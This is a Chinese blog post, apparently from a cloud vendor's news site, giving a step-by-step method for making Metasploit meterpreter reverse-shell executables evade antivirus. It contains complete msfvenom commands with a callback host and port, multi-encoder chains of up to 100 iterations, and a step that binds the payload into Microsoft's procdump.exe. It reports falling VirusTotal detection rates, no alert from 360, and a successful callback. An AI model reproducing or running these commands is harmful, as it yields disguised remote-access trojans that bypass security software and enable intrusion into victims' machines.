温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Metasploit的实例分析是怎样的

发布时间:2021-12-27 15:43:25 来源:亿速云 阅读:137 作者:柒染 栏目:网络安全

Metasploit的实例分析是怎样的,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

0x01 环境搭建

测试系统:windows10 (1909)

杀毒软件:360安全卫士

在线杀毒:VT

0x02 payload生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe

Metasploit的实例分析是怎样的

原始生成后,完全被查杀

Metasploit的实例分析是怎样的

VT查杀55/69

Metasploit的实例分析是怎样的

0x03 编码处理

这里使用msf自带的编码器进行测试

msfvenom --list encoders 查看当前所有编码器

Metasploit的实例分析是怎样的

这里根据级别(Rank)选择最好的(excellent)进行尝试:x86/shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -e x86/shikata_ga_nai -b "\x00" -i 20  -f exe -o t2.exe

其中-b 特征码绕过 -i 编码次数

Metasploit的实例分析是怎样的

Metasploit的实例分析是怎样的

依旧被查杀

0x04 编码捆绑

测试编码并绑定微软官方工具,这里使用官方procdump做实验

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -e x86/shikata_ga_nai -x procdump.exe  -i 20 -f exe -o t3.exe

Metasploit的实例分析是怎样的

360并未报毒,vt查杀率36/68

Metasploit的实例分析是怎样的

0x05多重编码

通过资料了解,msfvenom某一种编码器可以做到一定程度的免杀,这是可以多重编码增大免杀率,同时x86/shikata_ga_nai为多态编码,可以尝试增大编码次数达到免杀效果

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 100 LHOST=192.168.56.129 LPORT=7777 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 100 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 100 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 100 -x procdump.exe -k -f exe >t4.exe

这里测试编码次数100,同样绑定官方工具,360查杀并未报毒

Metasploit的实例分析是怎样的

VT在线查杀率34/68

Metasploit的实例分析是怎样的

测试可正常上线

Metasploit的实例分析是怎样的

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI